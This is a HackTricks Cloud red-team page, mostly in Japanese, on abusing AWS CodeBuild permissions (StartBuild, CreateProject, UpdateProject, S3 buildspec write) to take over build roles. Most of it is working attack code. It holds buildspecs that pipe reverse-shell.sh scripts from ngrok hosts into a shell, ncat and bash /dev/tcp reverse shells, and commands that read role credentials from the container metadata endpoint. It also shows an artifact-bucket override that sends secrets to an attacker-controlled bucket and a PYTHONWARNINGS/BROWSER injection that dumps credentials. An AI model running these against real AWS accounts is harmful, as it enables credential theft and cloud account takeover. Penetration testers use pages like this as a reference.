HackTricks CloudAWS - Codebuild Privesc
Tip
学んで実践する AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks をサポートする
- subscription plans を確認してください!
- 参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
codebuild
詳しくは以下を参照:
codebuild:StartBuild | codebuild:StartBuildBatch
これらのいずれかの権限があれば、新しい buildspec を指定してビルドを実行し、プロジェクトに割り当てられた iam role の token を奪うことができます:
cat > /tmp/buildspec.yml <<EOF
version: 0.2
phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF
aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
注意: これら二つのコマンドの違いは次の通りです:
StartBuildは特定のbuildspec.ymlを使って単一のビルドジョブをトリガーします。StartBuildBatchは複数のビルドを並列実行するようなより複雑な構成でバッチビルドを開始できます。
潜在的影響: 直接的な privesc をアタッチされた AWS Codebuild ロールへ。
StartBuild Env Var Override
たとえ プロジェクトを変更できない(UpdateProject)かつ buildspec を上書きできない 場合でも、codebuild:StartBuild はビルド時に環境変数を上書きすることが可能です。次の方法で:
- CLI:
--environment-variables-override - API:
environmentVariablesOverride
ビルドが挙動の制御(アップロード先バケット、feature flags、proxy 設定、ログ出力など)に環境変数を使っている場合、これだけでビルドロールがアクセスできるシークレットを持ち出す(exfiltrate)ことや、ビルド内でコード実行を得るのに十分な場合があります。
Example 1: Redirect Artifact/Upload Destination to Exfiltrate Secrets
ビルドが環境変数(例えば UPLOAD_BUCKET)で制御されるバケット/パスへアーティファクトを公開する場合、それを攻撃者が管理するバケットに上書きします:
export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"
export BUILD_ID=$(aws codebuild start-build \
--project-name "$PROJECT" \
--environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
--query build.id --output text)
# Wait for completion
while true; do
STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
[ "$STATUS" = "SUCCEEDED" ] && break
[ "$STATUS" = "FAILED" ] || [ "$STATUS" = "FAULT" ] || [ "$STATUS" = "STOPPED" ] || [ "$STATUS" = "TIMED_OUT" ] && exit 1
sleep 5
done
# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
例2: Python Startup Injection via PYTHONWARNINGS + BROWSER
もしビルドが python3 を実行する場合(buildspecsで一般的)、buildspecに触れずにコード実行を得られることがあります。手法は次のとおりです:
PYTHONWARNINGS: Python は category フィールドを解決し、ドット区切りのパスをインポートします。これを...:antigravity.x:...に設定すると、stdlib モジュールantigravityのインポートが強制されます。antigravity:webbrowser.open(...)を呼び出します。BROWSER:webbrowserが実行するものを制御します。Linux では:区切りです。#%sを使うと URL 引数がシェルのコメントになります。
これを使って CodeBuild ロールの認証情報(http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI から)を CloudWatch ログに出力し、ログの読み取り権限があれば回収できます。
展開可能: PYTHONWARNINGS + BROWSER トリック用の StartBuild JSON リクエスト
```json
{
"projectName": "codebuild_lab_7_project",
"environmentVariablesOverride": [
{
"name": "PYTHONWARNINGS",
"value": "all:0:antigravity.x:0:0",
"type": "PLAINTEXT"
},
{
"name": "BROWSER",
"value": "/bin/sh -c 'echo CREDS_START; URL=$(printf \"http\\\\072//169.254.170.2%s\" \"$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"); curl -s \"$URL\"; echo CREDS_END' #%s",
"type": "PLAINTEXT"
}
]
}
```
iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
攻撃者が**iam:PassRole, codebuild:CreateProject, および codebuild:StartBuild または codebuild:StartBuildBatch**の権限を持っている場合、実行中の codebuild プロジェクトを作成することで、任意の codebuild IAM role に権限を昇格させることができる。
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"
REV_PATH="/tmp/rev.json"
printf "$JSON" > $REV_PATH
# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
# Build it
aws codebuild start-build --project-name codebuild-demo-project
# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output
# Delete the project
aws codebuild delete-project --name codebuild-demo-project
Potential Impact: 任意の AWS Codebuild ロールへの直接的な privesc。
Warning
Codebuild container 内のファイル
/codebuild/output/tmp/env.shには、metadata credentials にアクセスするために必要なすべての env vars が含まれています。
このファイルには env variable
AWS_CONTAINER_CREDENTIALS_RELATIVE_URIが含まれており、認証情報にアクセスするための URL path を示しています。例えば次のような形式です/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420
それを URL
http://169.254.170.2/に追加すると、role credentials を dump できます。
さらに、コンテナのメタデータ情報を取得するための完全な URL を含む env variable
ECS_CONTAINER_METADATA_URIも含まれています。
iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
前のセクションと同様に、build project を作成する代わりに変更できる場合、IAM Role を指定してトークンを盗むことができます。
REV_PATH="/tmp/codebuild_pwn.json"
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"
printf "$JSON" > $REV_PATH
aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
Potential Impact: 任意の AWS Codebuild ロールへの直接 privesc。
codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
前節と同様ですが、iam:PassRole 権限なしで、これらの権限を悪用して既存の Codebuild プロジェクトを変更し、既に割り当てられているロールへアクセスできます。
REV_PATH="/tmp/codebuild_pwn.json"
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"
# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
printf "$JSON" > $REV_PATH
aws codebuild update-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
潜在的影響: 割り当てられた AWS Codebuild roles への直接的な privesc。
SSM
十分な権限で enough permissions to start a ssm session を持っていれば、ビルド中の inside a Codebuild project に入ることができます。
The codebuild project will need to have a breakpoint:
phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
- codebuild-breakpoint
そして:
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>
詳しくは check the docs.
(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject
特定の CodeBuild プロジェクトのビルドを開始/再起動でき、その buildspec.yml ファイルが attacker が write access を持つ S3 バケットに格納されている場合、attacker は CodeBuild プロセス内でコマンド実行を取得できます。
注意: このエスカレーションは、CodeBuild ワーカーが attacker と異なるロール(望ましくは attacker よりも権限が高いロール)を持っている場合にのみ該当します。
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
vim ./buildspec.yml
# Add the following lines in the "phases > pre_builds > commands" section
#
# - apt-get install nmap -y
# - ncat <IP> <PORT> -e /bin/sh
aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml
aws codebuild start-build --project-name <project-name>
# Wait for the reverse shell :)
次のような buildspec を使って reverse shell を得ることができます:
version: 0.2
phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
影響: 通常高い権限を持つ AWS CodeBuild worker が使用するロールへの直接的な privesc。
Warning
buildspec は zip 形式で想定される場合があるため、攻撃者は zip を download、unzip してルートディレクトリの
buildspec.ymlを modify、再度 zip して upload する必要がある点に注意してください。
More details could be found here.
潜在的影響: アタッチされた AWS Codebuild roles への直接的な privesc。
Tip
学んで実践する AWS Hacking:
学んで実践する GCP Hacking:
学んで実践する Az Hacking:HackTricks をサポートする
- subscription plans を確認してください!
- 参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.